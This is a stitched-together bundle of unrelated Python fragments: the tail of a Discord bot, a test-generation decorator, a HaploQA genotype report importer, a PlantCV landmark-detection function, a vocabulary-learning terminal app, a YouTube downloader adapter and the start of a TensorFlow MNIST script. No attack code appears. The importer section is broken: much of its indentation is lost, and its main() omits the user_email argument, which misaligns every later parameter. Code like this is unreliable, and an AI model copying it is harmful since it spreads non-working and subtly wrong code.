        jumps = math.ceil(dist / avgDist)
        time = jumps / rate
        msg = f'"{system}" is {dist:0.2f} ly from {name}. That\'s about {jumps} jumps or {time:0.2f} hours.'
    except Exception:
        # Narrowed from a bare `except:` so system-exiting exceptions propagate.
        msg = f'Could not process "target" command: {traceback.format_exc().splitlines()[-1]}'
    await bot.say(msg)
def get_token():
    """Read the bot token (first line, stripped) from data/token.secret."""
    with open('data/token.secret', 'r') as token_file:
        return token_file.readline().strip()


bot.run(get_token())
|
def generate_test(index, labels, data):
    """Build a test method replaying event sequence data[index].

    Each event id is mapped through *labels* to a method name on the test
    instance, and those methods are invoked in sequence order.
    """
    def test(self):
        for event_id in data[index]:
            getattr(self, labels[event_id])()
    return test


def _event_sequence_test_impl(labels, data):
    """Class-decorator factory attaching one generated test per sequence."""
    def decorate(clazz):
        for index in range(len(data)):
            # Test name encodes the whole event sequence, e.g. test_a_b_a.
            test_name = 'test_%s' % ('_'.join([labels[event_id] for event_id in data[index]]))
            setattr(clazz, test_name, generate_test(index, labels, data))
        return clazz
    return decorate


def event_sequence_test(data_source):
    """Decorator taking a data source exposing getLabels()/getData()."""
    return _event_sequence_test_impl(data_source.getLabels(), data_source.getData())


def event_sequence_test_raw(labels, data):
    """Decorator taking explicit labels and data instead of a data source."""
    return _event_sequence_test_impl(labels, data)
|
import argparse
import csv
from os.path import splitext, basename
import sys
import time
import haploqa.mongods as mds
import haploqa.sampleannoimport as sai
from pymongo.errors import DuplicateKeyError
# Section tags that delimit Illumina FinalReport files.
header_tag = '[header]'
data_tag = '[data]'
tags = {header_tag, data_tag}
# Column headers extracted from the [data] section.
snp_name_col_hdr = 'SNP Name'
x_col_hdr = 'X'
y_col_hdr = 'Y'
allele1_fwd_col_hdr = 'Allele1 - Forward'
allele2_fwd_col_hdr = 'Allele2 - Forward'
def import_final_report(user_email, generate_ids, on_duplicate, final_report_file, sample_anno_dicts, platform_id, sample_tags, db):
def save_sample(samp):
if samp is not None:
try:
samp = sai.merge_dicts(samp, sample_anno_dicts[samp['sample_id']])
except KeyError:
pass
if generate_ids:
# if we're asked to generate IDs we move the sample ID into "other_ids"
samp['other_ids'] = [samp['sample_id']]
samp['sample_id'] = mds.gen_unique_id(db)
else:
samp['other_ids'] = []
mds.post_proc_sample(samp, user_email)
samp['owner'] = user_email
if on_duplicate == 'replace':
update_res = db.samples.replace_one(
{'sample_id': samp['sample_id']},
samp,
upsert=True,
)
if update_res.upserted_id is None:
print('replaced sample with canonical ID:', samp['sample_id'])
else:
try:
db.samples.insert_one(samp)
except DuplicateKeyError:
if on_duplicate == 'skip':
print('skipping insert of duplicate sample with canonical ID:', samp['sample_id'])
else:
print(
'halting import after detecting duplicate canonical ID:',
samp['sample_id'],
file=sys.stderr,
)
raise
platform_chrs, snp_count_per_chr, snp_chr_indexes = mds.within_chr_snp_indices(platform_id, db)
prev_time = time.time()
all_sample_ids = set()
# for MiniMUGA, the files I've had access to had blank values for 'Sample ID'
# although the header value is there. The 'Sample Name' values were populated
# though so swap the sample ID column header to 'Sample Name'
if platform_id == 'MiniMUGA':
    sample_id_col_hdr = 'Sample Name'
else:
    sample_id_col_hdr = 'Sample ID'
# the column headers that must all be present in the data header row
data_col_hdrs = {
    snp_name_col_hdr, sample_id_col_hdr,
    x_col_hdr, y_col_hdr,
    allele1_fwd_col_hdr, allele2_fwd_col_hdr
}
with open(final_report_file, 'r') as final_report_handle:
    final_report_table = csv.reader(final_report_handle, delimiter='\t')
    curr_section = data_tag
    data_header_indexes = None
    curr_sample = None
    for row_index, row in enumerate(final_report_table):
        # raise a format error for the current line, optionally chaining a cause
        def fmt_err(msg, cause=None):
            ex = Exception('Format Error in {} line {}: {}'.format(final_report_file, row_index + 1, msg))
            if cause is None:
                raise ex
            else:
                raise ex from cause
        # fetch the (stripped) value of the named column from the current row
        def string_val(col_name):
            return row[data_header_indexes[col_name]].strip()
        # like string_val but converts to float; 'NA' becomes NaN
        def float_val(col_name):
            str_val = string_val(col_name)
            try:
                return float(str_val)
            except ValueError as e:
                if str_val.upper() == 'NA':
                    return float('nan')
                else:
                    fmt_err('failed to convert "' + str_val + '" into a float', e)
        # just ignore empty lines
        if row:
            if len(row) == 1 and row[0].lower() in tags:
                # a one-cell row naming a section (eg "[Header]"/"[Data]") switches sections
                curr_section = row[0].lower()
            else:
                if curr_section == header_tag:
                    # TODO do something with the header data
                    pass
                elif curr_section == data_tag:
                    if data_header_indexes is None:
                        # this is the header. we'll just make note of the indices
                        data_header_indexes = {
                            col_hdr: i
                            for i, col_hdr in enumerate(row)
                            if col_hdr in data_col_hdrs
                        }
                        # confirm that all are represented
                        for col_hdr in data_col_hdrs:
                            if col_hdr not in data_header_indexes:
                                fmt_err('failed to find required header "{}" in data header'.format(col_hdr))
                    else:
                        snp_name = string_val(snp_name_col_hdr)
                        sample_id = string_val(sample_id_col_hdr)
                        x = float_val(x_col_hdr)
                        y = float_val(y_col_hdr)
                        allele1_fwd = string_val(allele1_fwd_col_hdr)
                        allele2_fwd = string_val(allele2_fwd_col_hdr)
                        if curr_sample is None or sample_id != curr_sample['sample_id']:
                            # if we've seen this ID before it means that rows are not grouped by sample ID
                            if sample_id in all_sample_ids:
                                raise Exception('Final report must be grouped by sample ID but it is not')
                            # we hit a new sample so at this point we commit the curr_sample to the
                            # DB and move on to building a new sample
                            all_sample_ids.add(sample_id)
                            save_sample(curr_sample)
                            curr_time = time.time()
                            print('took {:.1f} sec. importing sample: {}'.format(curr_time - prev_time, sample_id))
                            prev_time = curr_time
                            # preallocate per-chromosome arrays (NaN/'-' mark missing SNPs)
                            chr_dict = dict()
                            for chr in platform_chrs:
                                curr_snp_count = snp_count_per_chr[chr]
                                chr_dict[chr] = {
                                    'xs': [float('nan')] * curr_snp_count,
                                    'ys': [float('nan')] * curr_snp_count,
                                    'allele1_fwds': ['-'] * curr_snp_count,
                                    'allele2_fwds': ['-'] * curr_snp_count,
                                }
                            curr_sample = {
                                'sample_id': sample_id,
                                'platform_id': platform_id,
                                'chromosome_data': chr_dict,
                                'tags': sample_tags,
                                'unannotated_snps': [],
                            }
                        # look up where this SNP lives on its chromosome (None if unknown)
                        try:
                            snp_chr_index = snp_chr_indexes[snp_name]
                        except KeyError:
                            snp_chr_index = None
                        if snp_chr_index is not None:
                            snp_chr = snp_chr_index['chromosome']
                            snp_index = snp_chr_index['index']
                            curr_sample_chr = curr_sample['chromosome_data'][snp_chr]
                            curr_sample_chr['xs'][snp_index] = x
                            curr_sample_chr['ys'][snp_index] = y
                            curr_sample_chr['allele1_fwds'][snp_index] = allele1_fwd
                            curr_sample_chr['allele2_fwds'][snp_index] = allele2_fwd
                        else:
                            # SNP not on the platform map: keep it, unplaced
                            curr_sample['unannotated_snps'].append({
                                'snp_name': snp_name,
                                'x': x,
                                'y': y,
                                'allele1_fwd': allele1_fwd,
                                'allele2_fwd': allele2_fwd,
                            })
    # flush the final sample (the loop only saves on sample transitions)
    save_sample(curr_sample)
def main():
    """Parse command-line arguments and run the final-report import.

    Expects the GenomeStudio "Standard" final report (tab separated) plus
    optional tab-delimited sample annotation files.
    """
    # parse command line arguments
    parser = argparse.ArgumentParser(description='import the final report with probe intensities')
    parser.add_argument(
        '--generate-ids',
        action='store_true',
        help='this option indicates that the "Sample ID" column should be treated as a non-canonical identifier and '
             'a canonical ID will be automatically generated for each sample',
    )
    parser.add_argument(
        '--on-duplicate',
        choices=['halt', 'skip', 'replace'],
        # BUG FIX: the help text used to reference a nonexistent
        # "--canonical-ids" option; the related flag is --generate-ids.
        # The explicit default of 'halt' matches the previous behavior
        # when the option was omitted (duplicates raised an error).
        default='halt',
        help='this option is only meaningful when --generate-ids is not set. This indicates what action to take if a '
             'duplicate canonical ID is encountered during import: halt the import process with an error message, '
             'skip the sample with a warning message or replace the existing sample with a warning',
    )
    parser.add_argument(
        'platform',
        help='the platform for the data we are importing. eg: MegaMUGA')
    parser.add_argument(
        'final_report',
        help='the final report file as exported by GenomeStudio Genotyping Module. This report must '
             'be tab separated, must be in the "Standard" format and must contain '
             'at least the following columns: '
             'SNP Name, Sample ID, X, Y, Allele1 - Forward, Allele2 - Forward')
    parser.add_argument(
        'sample_annotation_txt',
        nargs='*',
        help='an (optional) tab-delimited sample annotation file. There should be a header row and one row per sample')
    args = parser.parse_args()
    # merge all annotation files into one sample_id -> annotations mapping
    sample_anno_dicts = dict()
    for sample_anno_filename in args.sample_annotation_txt:
        curr_dicts = sai.sample_anno_dicts(sample_anno_filename)
        sample_anno_dicts = sai.merge_dicts(sample_anno_dicts, curr_dicts)
    # tag each imported sample with the report file name and platform
    report_name = splitext(basename(args.final_report))[0]
    import_final_report(
        args.generate_ids,
        args.on_duplicate,
        args.final_report,
        sample_anno_dicts,
        args.platform,
        [report_name, args.platform],
        mds.init_db())
if __name__ == '__main__':
    main()
|
# Identify landmark positions within a contour for morphometric analysis
import numpy as np
import math
import cv2
from plantcv.plantcv import params
from plantcv.plantcv._debug import _debug
def acute(img, obj, mask, win, threshold):
    """
    Identify landmark positions within a contour for morphometric analysis
    Inputs:
    img = Original image used for plotting purposes
    obj = An opencv contour array of interest to be scanned for landmarks
    mask = binary mask used to generate contour array (necessary for ptvals)
    win = maximum cumulative pixel distance window for calculating angle
    score; 1 cm in pixels often works well
    threshold = angle score threshold to be applied for mapping out landmark
    coordinate clusters within each contour
    Outputs:
    homolog_pts = pseudo-landmarks selected from each landmark cluster
    start_pts = pseudo-landmark island starting position; useful in parsing homolog_pts in downstream analyses
    stop_pts = pseudo-landmark island end position ; useful in parsing homolog_pts in downstream analyses
    ptvals = average values of pixel intensity from the mask used to generate cont;
    useful in parsing homolog_pts in downstream analyses
    chain = raw angle scores for entire contour, used to visualize landmark
    clusters
    verbose_out = supplemental file which stores coordinates, distance from
    landmark cluster edges, and angle score for entire contour. Used
    in troubleshooting.
    :param img: numpy.ndarray
    :param obj: numpy.ndarray
    :param mask: numpy.ndarray
    :param win: int
    :param threshold: int
    :return homolog_pts:
    """
    # Pass 1: score the interior angle at every contour vertex using the
    # farthest neighbors within `win` pixels on either side.
    chain = []  # Create empty chain to store angle scores
    for k in list(range(len(obj))):  # Coordinate-by-coordinate 3-point assignments
        vert = obj[k]
        dist_1 = 0
        for r in range(len(obj)):  # Reverse scan to obtain point A
            rev = k - r
            pos = obj[rev]
            dist_2 = np.sqrt(np.square(pos[0][0]-vert[0][0])+np.square(pos[0][1]-vert[0][1]))
            if r >= 2:
                if (dist_2 > dist_1) & (dist_2 <= win):  # Further from vertex than current pt A while within window?
                    dist_1 = dist_2
                    pt_a = pos  # Load best fit within window as point A
                elif dist_2 > win:
                    break
            else:
                pt_a = pos
        dist_1 = 0
        for f in range(len(obj)):  # Forward scan to obtain point B
            fwd = k + f
            if fwd >= len(obj):
                fwd -= len(obj)  # wrap around the closed contour
            pos = obj[fwd]
            dist_2 = np.sqrt(np.square(pos[0][0]-vert[0][0])+np.square(pos[0][1]-vert[0][1]))
            if f >= 2:
                if (dist_2 > dist_1) & (dist_2 <= win):  # Further from vertex than current pt B while within window?
                    dist_1 = dist_2
                    pt_b = pos  # Load best fit within window as point B
                elif dist_2 > win:
                    break
            else:
                pt_b = pos
        # Angle in radians derived from Law of Cosines, converted to degrees
        p12 = np.sqrt((vert[0][0]-pt_a[0][0])*(vert[0][0]-pt_a[0][0])+(vert[0][1]-pt_a[0][1])*(vert[0][1]-pt_a[0][1]))
        p13 = np.sqrt((vert[0][0]-pt_b[0][0])*(vert[0][0]-pt_b[0][0])+(vert[0][1]-pt_b[0][1])*(vert[0][1]-pt_b[0][1]))
        p23 = np.sqrt((pt_a[0][0]-pt_b[0][0])*(pt_a[0][0]-pt_b[0][0])+(pt_a[0][1]-pt_b[0][1])*(pt_a[0][1]-pt_b[0][1]))
        dot = (p12*p12 + p13*p13 - p23*p23)/(2*p12*p13)
        # Used a random number generator to test if either of these cases were possible but neither is possible
        # if dot > 1:              # If float exceeds 1 prevent arcos error and force to equal 1
        #     dot = 1
        # elif dot < -1:           # If float exceeds -1 prevent arcos error and force to equal -1
        #     dot = -1
        ang = math.degrees(math.acos(dot))
        # print(str(k)+' '+str(dot)+' '+str(ang))
        chain.append(ang)
    # Pass 2: collect the vertex indices whose angle is at or below threshold.
    index = []  # Index chain to find clusters below angle threshold
    for c, link in enumerate(chain):  # Identify links in chain with acute angles
        if float(link) <= threshold:
            index.append(c)  # Append positions of acute links to index
    # acute_pos = obj[index]       # Extract all island points blindly
    #
    # float(len(acute_pos)) / float(len(obj))  # Proportion of informative positions
    if len(index) != 0:
        # Pass 3: group consecutive (or near-consecutive) acute indices into
        # "islands"; nearby islands separated by < win/2 pixels are merged.
        isle = []
        island = []
        for ind in index:  # Scan for iterative links within index
            if not island:
                island.append(ind)  # Initiate new link island
            elif island[-1]+1 == ind:
                island.append(ind)  # Append successful iteration to island
            elif island[-1]+1 != ind:
                pt_a = obj[ind]
                pt_b = obj[island[-1]+1]
                dist = np.sqrt(np.square(pt_a[0][0]-pt_b[0][0])+np.square(pt_a[0][1]-pt_b[0][1]))
                if win/2 > dist:
                    island.append(ind)
                else:
                    isle.append(island)
                    island = [ind]
        isle.append(island)
        if len(isle) > 1:
            # islands touching both contour ends are actually one island
            if (isle[0][0] == 0) & (isle[-1][-1] == (len(chain)-1)):
                if params.debug is not None:
                    print('Fusing contour edges')
                island = isle[-1]+isle[0]  # Fuse overlapping ends of contour
                # Delete islands to be spliced if start-end fusion required
                del isle[0]
                del isle[-1]
                isle.insert(0, island)  # Prepend island to isle
        else:
            if params.debug is not None:
                print('Microcontour...')
        # Homologous point maximum distance method
        pt = []
        vals = []
        maxpts = []
        ss_pts = []
        ts_pts = []
        ptvals = []
        max_dist = [['cont_pos', 'max_dist', 'angle']]
        for island in isle:
            # Identify if contour is concavity/convexity using image mask
            pix_x, pix_y, w, h = cv2.boundingRect(obj[island])  # Obtain local window around island
            for c in range(w):
                for r in range(h):
                    # Identify pixels in local window internal to the island hull
                    pos = cv2.pointPolygonTest(obj[island], (pix_x+c, pix_y+r), 0)
                    if 0 < pos:
                        vals.append(mask[pix_y+r][pix_x+c])  # Store pixel value if internal
            if len(vals) > 0:
                ptvals.append(sum(vals)/len(vals))
                vals = []
            else:
                ptvals.append('NaN')  # If no values can be retrieved (small/collapsed contours)
                vals = []
            # Identify pixel coordinate to use as pseudolandmark for island
            # if len(isle[x]) == 1:        # If landmark is a single point (store position)
            #     if debug == True:
            #         print('route A')
            #     pt = isle[x][0]
            #     max_dist.append([isle[x][0], '-', chain[isle[x][0]]])
            #     # print pt
            # elif len(isle[x]) == 2:      # If landmark is a pair of points (store more acute position)
            #     if debug == True:
            #         print('route B')
            #     pt_a = chain[isle[x][0]]
            #     pt_b = chain[isle[x][1]]
            #     print(pt_a, pt_b)
            #     if pt_a == pt_b:
            #         pt = isle[x][0]      # Store point A if both are equally acute
            #         max_dist.append([isle[x][0], '-', chain[isle[x][0]]])
            #     elif pt_a < pt_b:
            #         pt = isle[x][0]      # Store point A if more acute
            #         max_dist.append([isle[x][0], '-', chain[isle[x][0]]])
            #     elif pt_a > pt_b:
            #         pt = isle[x][1]      # Store point B if more acute
            #         max_dist.append([isle[x][1], '-', chain[isle[x][1]]])
            #     # print pt
            # NOTE: islands of fewer than 3 points are skipped entirely
            # (routes A/B above are disabled), so no landmark is emitted for them.
            if len(island) >= 3:  # If landmark is multiple points (distance scan for position)
                if params.debug is not None:
                    print('route C')
                ss = obj[island[0]]   # Store isle "x" start site
                ts = obj[island[-1]]  # Store isle "x" termination site
                dist_1 = 0
                for d in island:  # Scan from ss to ts within isle "x"
                    site = obj[[d]]
                    ss_d = np.sqrt(np.square(ss[0][0] - site[0][0][0]) + np.square(ss[0][1] - site[0][0][1]))
                    ts_d = np.sqrt(np.square(ts[0][0] - site[0][0][0]) + np.square(ts[0][1] - site[0][0][1]))
                    # Current mean distance of 'd' to 'ss' & 'ts'
                    dist_2 = np.mean([np.abs(ss_d), np.abs(ts_d)])
                    max_dist.append([d, dist_2, chain[d]])
                    if dist_2 > dist_1:  # Current mean distance better fit that previous best?
                        pt = d
                        dist_1 = dist_2  # Current mean becomes new best mean
                # print pt
                if params.debug is not None:
                    print(f"Landmark site: {pt}, Start site: {island[0]}, Term. site: {island[-1]}")
                maxpts.append(pt)  # Empty 'pts' prior to next mean distance scan
                ss_pts.append(island[0])
                ts_pts.append(island[-1])
        if params.debug is not None:
            print(f'Landmark point indices: {maxpts}')
            print(f'Starting site indices: {ss_pts}')
            print(f'Termination site indices: {ts_pts}')
        homolog_pts = obj[maxpts]
        start_pts = obj[ss_pts]
        stop_pts = obj[ts_pts]
        ori_img = np.copy(img)
        # Convert grayscale images to color
        if len(np.shape(ori_img)) == 2:
            ori_img = cv2.cvtColor(ori_img, cv2.COLOR_GRAY2BGR)
        # Draw acute points on the original image
        cv2.drawContours(ori_img, homolog_pts, -1, (255, 255, 255), params.line_thickness)
        # print/plot debug image
        _debug(visual=ori_img, filename=f"{params.device}_acute_plms.png")
        return homolog_pts, start_pts, stop_pts, ptvals, chain, max_dist
    else:
        # no acute vertices found: return empty results of matching arity
        return [], [], [], [], [], []
|
__author__ = "Radek Warowny"
__licence__ = "GPL"
__version__ = "1.0.1"
__maintainer__ = "Radek Warowny"
__email__ = "radekwarownydev@gmail.com"
__status__ = "Demo"
import getpass
import math
import sqlite3
import pandas as pd
import os
import shutil
import sys
import time
from db import db_conn, check_user, insert_word
words = [] # list of words typed in current session
def print_centre(s):
    """Print *s* horizontally centred in the current terminal window."""
    width = shutil.get_terminal_size().columns
    print(s.center(width))
def logo():
    """Render the centred ASCII-art banner plus the quit hint."""
    banner = (
        '░██████╗░░█████╗░██╗░░░░░██████╗░ ██╗░░░░░██╗░██████╗████████╗',
        '██╔════╝░██╔══██╗██║░░░░░██╔══██╗ ██║░░░░░██║██╔════╝╚══██╔══╝',
        '██║░░██╗░██║░░██║██║░░░░░██║░░██║ ██║░░░░░██║╚█████╗░░░░██║░░░',
        '██║░░╚██╗██║░░██║██║░░░░░██║░░██║ ██║░░░░░██║░╚═══██╗░░░██║░░░',
        '╚██████╔╝╚█████╔╝███████╗██████╔╝ ███████╗██║██████╔╝░░░██║░░░',
        '░╚═════╝░░╚════╝░╚══════╝╚═════╝░ ╚══════╝╚═╝╚═════╝░░░░╚═╝░░░',
        "𝕓𝕪 ℝ𝕒𝕕𝕖𝕜                                      PRESS q to QUIT",
    )
    for row in banner:
        print_centre(row)
def introduction():
    # First-run walkthrough: explains the GOLD LIST method with a short
    # animated (sleep-paced) text sequence and a diagram of the four lists.
    # Blocks twice on input() so the user can read at their own pace.
    os.system('clear')
    print_centre("Struggling with learning a foreign language? ")
    time.sleep(1)
    print_centre("Tired of flashcards and memorising glossaries? ")
    time.sleep(1)
    print_centre("If so, the GOLD LIST method may help.")
    time.sleep(1)
    print_centre("PRESS ANY KEY")
    input()
    os.system('clear')
    print()
    # Diagram: main list feeding three successive "distillations".
    print_centre("  +-------------------------+      +--------------------------+")
    print_centre("  |                         |      |                          |")
    print_centre("  |                               --->                        |")
    print_centre("  |                         |      |                          |")
    print_centre("  |                         |      |     1st DISTILLATION     |")
    print_centre("  |        MAIN LIST        |      |         17 WORDS         |")
    print_centre("  |         25 WORDS        |      |                          |")
    print_centre("  |                         |      |                          |")
    print_centre("  |                         |      |                          |")
    print_centre("  |   ▲                     |      +----------------------|---+")
    print_centre("  +---|---------------------+      +----------------------|---+")
    print_centre("  +---|---------------------+      |                      ▼   |")
    print_centre("  |                         |      |                          |")
    print_centre("  |                         |      |     2nd DISTILLATION     |")
    print_centre("  |     3rd DISTILLATION    |      |         11 WORDS         |")
    print_centre("  |         7 WORDS                <---                       |")
    print_centre("  |                         |      |                          |")
    print_centre("  |                         |      |                          |")
    print_centre("  +-------------------------+      +--------------------------+")
    print()
    print_centre("You start by typing words from the dictionary.")
    time.sleep(1)
    print_centre("Then you wait for at least two weeks to find out")
    time.sleep(1)
    print_centre("that you almost miraculously remembered 30% words")
    time.sleep(1)
    print_centre("from each list. All thanks to the power of moving information")
    time.sleep(1)
    print_centre("from short to long-term memory")
    time.sleep(1)
    print_centre("PRESS ANY KEY")
    input()
    os.system('clear')
def login_interface():
    # Prompt for username/password; offer account creation for unknown
    # credentials. Returns the password (used downstream as the user key),
    # or None if the ValueError handler below fires.
    os.system('clear')
    logo()  # application logo
    try:
        print_centre('USERNAME: ')
        username = input(''.center(112))
        if username == 'q':
            print_centre("PROGRAM TERMINATES")
            time.sleep(1)
            sys.exit()
        print_centre('PASSWORD: ')
        password = getpass.getpass(''.center(112))  # getpass renders input invisible
        # local import also brings in create_user, which the module-level
        # import does not provide
        from db import check_user, create_user, insert_word, db_conn
        if not username or not password:
            print_centre('INVALID INPUT')
        else:
            # NOTE(review): only the password is passed to check_user, so the
            # username appears to play no part in authentication — confirm
            # against db.check_user's implementation.
            if not check_user(password)[1]:  # CREATE ACCOUNT INTERFACE
                print_centre('CREATE ACCOUNT(Y/N): ')
                response = getpass.getpass(''.center(112))
                if response.lower() != 'y':
                    print_centre('PROGRAM TERMINATES')
                    time.sleep(1)
                    sys.exit()
                else:
                    introduction()
                    create_user(username, password)
                    check_user(password)
                    print()
                    print_centre('PROGRAM STARTS')
                    print()
                    time.sleep(1)
            else:
                pass
        # returned even after 'INVALID INPUT' above — NOTE(review): verify
        # whether empty credentials should really fall through to here
        return password
    except ValueError as e:
        print(e)
def dict_load():
    """Load the English CSV dictionary and keep the word/explanation columns."""
    frame = pd.read_csv('en_dict.csv')
    frame.columns = ['word', 'grammar', 'explanation']
    return frame[['word', 'explanation']]
def user_input():
    # Read one "word explanation..." line from the user.
    # Empty input redraws the screen; 'q' opens the menu; otherwise the
    # first token is the word and the rest is its explanation, both
    # title-cased and stored. Recurses into interface() (mutual recursion).
    print('\n\n\n')
    user_word = input(''.center(90))
    if user_word == "":
        interface()
    elif user_word == 'q':
        show_menu()
    else:
        try:
            word = user_word.split(' ', 1)[0]
            # raises IndexError when no explanation follows the word
            explanation = user_word.split(' ', 1)[1]
            word = word.title()
            explanation = explanation.title()
            words.append(word)  # session-level word list (module global)
            insert_word(word, explanation, user_id[0])
        except IndexError:
            # NOTE(review): this triggers on a word without an explanation,
            # not on blank input — the message is slightly misleading.
            print_centre("\n\t\tINPUT MUST NOT BE BLANK.")
            time.sleep(2)
            interface()
    return interface()
def interface():
    # Main application interface
    # loads in one word - explanation pair from dictionary CSV file
    # NOTE(review): parsing the sampled row back out of to_string() is
    # fragile — words containing spaces would split incorrectly; confirm
    # the dictionary only holds single-token words.
    sample = word_explanation.sample(1)
    final_word = sample.to_string(index=False, header=False)
    word = str(final_word.split(' ')[1])
    explanation = ' '.join(final_word.split(' ')[3:])
    explanation = str(explanation)
    os.system('clear')  # clears the screen so interface stays at the top
    print_centre("***  🅆🄾🅁🄳  **********  🄴🅇🄿🄻🄰🄽🄰🅃🄸🄾🄽 ***  PAGE NO {}  ***\n".format(count_pages()))
    print(', '.join(words))  # words already typed this session
    print_centre('{}   ---   {}'.format(str(word), str(explanation)))
    user_input()  # hand control to the input loop (mutual recursion)
def get_last_word():
    """Print the word most recently saved by the current user.

    BUG FIX: the previous query used ``SELECT min(word)``, which returns
    the alphabetically *first* word rather than the last one saved. We
    order by rowid (sqlite insertion order) and take the newest row.
    """
    user = (user_id[0],)
    conn = sqlite3.connect('goldlist_db.sqlite')
    cur = conn.cursor()
    cur.execute(
        'SELECT word FROM word_explanation WHERE user_id =? '
        'ORDER BY rowid DESC LIMIT 1',
        user,
    )
    row = cur.fetchone()
    # row is None when the user has not saved any words yet
    output = row[0] if row is not None else None
    print_centre(output)
    cur.close()
    conn.close()
# def show_list(n):
#
# # shows all words saved in current session
# os.system('clear')
# user = (user_id[0],)
# conn = sqlite3.connect('goldlist_db.sqlite')
# cur = conn.cursor()
#
# cur.execute('SELECT word FROM word_explanation WHERE user_id =?', user)
# rows = cur.fetchall()
# no = 1
# for row in range(n):
# print("{}. {}".format(no, row[0]))
# no += 1
# count_pages()
# cur.close()
# conn.close()
def count_pages():
    """Return the page the current user is on (25 words per page).

    Page numbering starts at 1: words 0-24 are page 1, the 26th word
    starts page 2, and so on. Equivalent to the previous
    ``math.floor(number / 25 + 1)``; the old ``if pages == 0`` branch was
    unreachable (the minimum value here is 1) and has been removed.
    """
    user = (user_id[0],)
    conn = sqlite3.connect('goldlist_db.sqlite')
    cur = conn.cursor()
    cur.execute('SELECT COUNT(word) FROM word_explanation WHERE user_id =?', user)
    number = int(cur.fetchone()[0])
    cur.close()
    conn.close()
    return number // 25 + 1
def show_pages():
    # Page-listing screen: reports the page count, asks which page to view,
    # then prints the user's saved words.
    os.system('clear')
    print()
    print_centre('YOU CURRENTLY HAVE {} PAGES.'.format(count_pages()))
    print_centre('CHOSE PAGE')
    print()
    # NOTE(review): `n` is read but never used — every word is listed
    # regardless of the chosen page. Pagination appears unfinished.
    n = int(getpass.getpass(''.center(112)))
    # shows all words saved in current session
    os.system('clear')
    user = (user_id[0],)
    conn = sqlite3.connect('goldlist_db.sqlite')
    cur = conn.cursor()
    cur.execute('SELECT word FROM word_explanation WHERE user_id =?', user)
    rows = cur.fetchall()
    no = 1
    for row in rows:
        print("{}. {}".format(no, row[0]))
        no += 1
    # NOTE(review): return value discarded — this call looks vestigial.
    count_pages()
    cur.close()
    conn.close()
def show_distill():
    # Distillations screen — currently a placeholder header with no
    # word listing behind it.
    os.system('clear')
    print()
    print_centre("YOUR DISTILLED WORDS: ")
def show_dict():
    """Render the (read-only) dictionary-selection screen."""
    os.system('clear')
    screen_lines = (
        "",  # blank spacer printed as a plain empty line
        "DICTIONARIES",
        "EN  DE  FR  PL",
        "",
        "CURRENT DICTIONARY: EN",
        "",
        "(DICTIONARY CHANGE NOT SUPPORTED)",
    )
    for line in screen_lines:
        if line:
            print_centre(line)
        else:
            print()
def show_menu():
    """Show the top-level menu and dispatch on the user's choice.

    BUG FIX: the original converted the raw input with ``int()`` before
    ever comparing it to 's', so pressing 's' (or any non-numeric key
    other than 'q') crashed with ValueError. All comparisons are now done
    on the raw string, with a dispatch table for the numbered entries.
    """
    os.system('clear')
    logo()
    print()
    print_centre("1. YOUR DICTIONARY")
    print_centre("2. YOUR PAGES")
    print_centre("3. YOUR DISTILLATIONS")
    print_centre("4. YOUR ACCOUNT")
    print_centre("PRESS 'S' TO START")
    print()
    option_input = getpass.getpass(''.center(112))
    # numbered menu entries -> screen functions
    screens = {
        "1": show_dict,
        "2": show_pages,
        "3": show_distill,
        "4": show_account,
    }
    if option_input == "q":
        print_centre('PROGRAM TERMINATES')
        time.sleep(1)
        sys.exit()
    elif option_input == "s":
        interface()
    elif option_input in screens:
        screens[option_input]()
        getpass.getpass(''.center(112))  # wait for a keypress before returning
        show_menu()
    else:
        print("\nINVALID INPUT")
        time.sleep(1)
        show_menu()
def show_account():
    # Account screen (mostly placeholder): shows prompts, then reads a key
    # to either start typing words or fall back to the menu.
    os.system('clear')
    logo()
    print()
    print_centre("ADD NAME: ")
    print()
    print_centre("PRESS 's' TO START ")
    # NOTE(review): this unconditional interface() call fires before the
    # quit hint below is printed or the user's choice is read — it looks
    # unintentional; confirm whether it should be removed.
    interface()
    print()
    print_centre(" PRESS 'q' TO QUIT ")
    print()
    option_input = getpass.getpass(''.center(112))
    if option_input == "s":
        interface()
    elif option_input == "q":
        show_menu()
    else:
        print_centre("INVALID INPUT")
        time.sleep(1)
        show_account()
# Program start-up sequence (runs on import/execution of this module).
db_conn()  # 1. ensure the database connection/tables exist
user_id = check_user(login_interface())[0]  # log in (or create account) and keep the user key
word_explanation = dict_load()  # 2. Loading Dictionary
interface()  # 4. Running Program
|
from pathlib import Path
from typing import List, Optional
from youtube_series_downloader.app.download_new_episodes.download_new_episodes_repo import (
DownloadNewEpisodesRepo,
)
from youtube_series_downloader.core.channel import Channel
from youtube_series_downloader.core.video import Video
from youtube_series_downloader.gateways.ffmpeg_gateway import FfmpegGateway
from youtube_series_downloader.gateways.sqlite_gateway import SqliteGateway
from youtube_series_downloader.gateways.youtube_dl_gateway import YoutubeDlGateway
from youtube_series_downloader.gateways.youtube_gateway import YoutubeGateway
class AppAdapter(DownloadNewEpisodesRepo):
    """Repository adapter wiring the download-new-episodes use case to its
    concrete gateways: YouTube feed, youtube-dl, ffmpeg and SQLite."""
    def __init__(self) -> None:
        # The SQLite gateway is the only stateful dependency; the other
        # gateways are used through static calls.
        self.sqlite_gateway = SqliteGateway()
    def close(self) -> None:
        """Close the underlying SQLite gateway."""
        self.sqlite_gateway.close()
    def get_latest_videos(self, channel: Channel) -> List[Video]:
        """Fetch the channel's most recent videos from YouTube."""
        return YoutubeGateway.get_videos(channel)
    def has_downloaded(self, video: Video) -> bool:
        """Return True if this video id is already recorded as downloaded."""
        return self.sqlite_gateway.has_downloaded(video.id)
    def set_as_downloaded(self, channel: Channel, video: Video) -> None:
        """Record the video as downloaded for the given channel."""
        return self.sqlite_gateway.add_downloaded(channel.name, video.id)
    def get_next_episode_number(self, channel: Channel) -> int:
        """Return the next unused episode number for the channel."""
        return self.sqlite_gateway.get_next_episode_number(channel.name)
    def download(self, video: Video) -> Optional[Path]:
        """Download the video; returns the file path or None on failure."""
        return YoutubeDlGateway.download(video)
    def render(self, video: Video, in_file: Path, out_file: Path, speed: float) -> bool:
        """Re-encode in_file to out_file at the given speed; True on success."""
        return FfmpegGateway.render(video, in_file, out_file, speed)
|
#!/usr/bin/python3
# implement TF model which will be used to classify MNIST digits using keras.
#
# Name: R. Melton
# email: rnm@pobox.com
# date: 1/3/2021
# based on: https://www.youtube.com/watch?v=bee0GrKBCrE
# you will need sudo apt install nvidia-cuda-toolkit
import tensorflow as tf
from tensorflow import keras
